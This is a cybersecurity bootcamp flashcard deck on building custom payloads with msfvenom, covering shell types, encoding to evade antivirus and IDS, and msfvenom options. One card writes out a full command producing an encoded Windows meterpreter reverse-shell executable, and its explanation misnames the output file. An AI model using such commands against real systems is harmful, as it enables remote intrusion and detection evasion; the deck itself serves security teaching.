Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Cybersecurity Bootcamp Study Aid > 17.3 Custom Payloads with msfvenom > Flashcards

17.3 Custom Payloads with msfvenom Flashcards

1
Q

What are payloads?

A

A payload is the shell code that runs when an exploit successfully compromises a system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What do attackers build custom payloads?

A

Attackers typically build custom payloads that they can use in phishing emails or add to their websites. When unsuspecting users click the link for the malicious payload, their computers are infected

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Custom payloads allow customization of various payload options such as:

A
  • Architecture
  • Shell type
    • Reverse
    • Bind
    • Meterpreter
    • Other proprietary C2 shell
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

In order to create custom payloads, attackers use a tool called ______, which is Metasploit framework tool used to _____________.

A

In order to create custom payloads, attackers use a tool called msfvenom, which is Metasploit framework tool used to generate and encode payloads.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Metasploit doesneeds to be running in order to use msfvenom.

A

False

Metasploit does not need to be running in order to use msfvenom.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

While it’s relatively easy to create custom payloads, the real challenge is ____________.

A

While it’s relatively easy to create custom payloads, the real challenge is creating a payload that bypasses network detection by IDS and antivirus (AV) solutions.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

________ is a method used to evade detection tools.

A

**Encoding** is a method used to evade detection tools.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

How does encoding evade detection?

A
  • It changes the signature of an exploit or payload, creating a new signature that has no written rule.
  • This change in signature allows payloads to bypass detection from AV and IDS tools that detect known malicious signatures.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

The most important msfvenom options are:

  • -p –
  • -e –
  • -a –
  • -s –
  • -i –
  • -x –
  • -o –
A
  • -p – designates the Metasploit payload we want to use.
  • -e – designates the encoder we want to use.
  • -a – designates the architecture we want to use (the default is x86).
  • -s – designates the maximum size of the payload.
  • -i – designates the number of iterations with which to encode the payload.
  • -x – designates a custom executable file to use as a template.
  • -o – designates an output file to be created, specifying its name and location.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Explain the following command:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe -o /tmp/hack.exe LHOST=192.168.0.8 LPORT=4444

A

- msfvenom: Launches the msfvenom program.

- -p: Indicates payload.

- windows/meterpreter/reverse_tcp: The Metasploit command module.

- -a x86: Designates the architecture we will use. x86 is default.

- -e x86/shikata_ga_nai: Designates the encoder we will use.

- -f exe: Indicates the file type to create. In this case, .exe.

- -o /tmp/malware.exe: Creates an output file, naming the file (malware.exe) and location (inside the /tmp directory).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly

Cybersecurity Bootcamp Study Aid (55 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions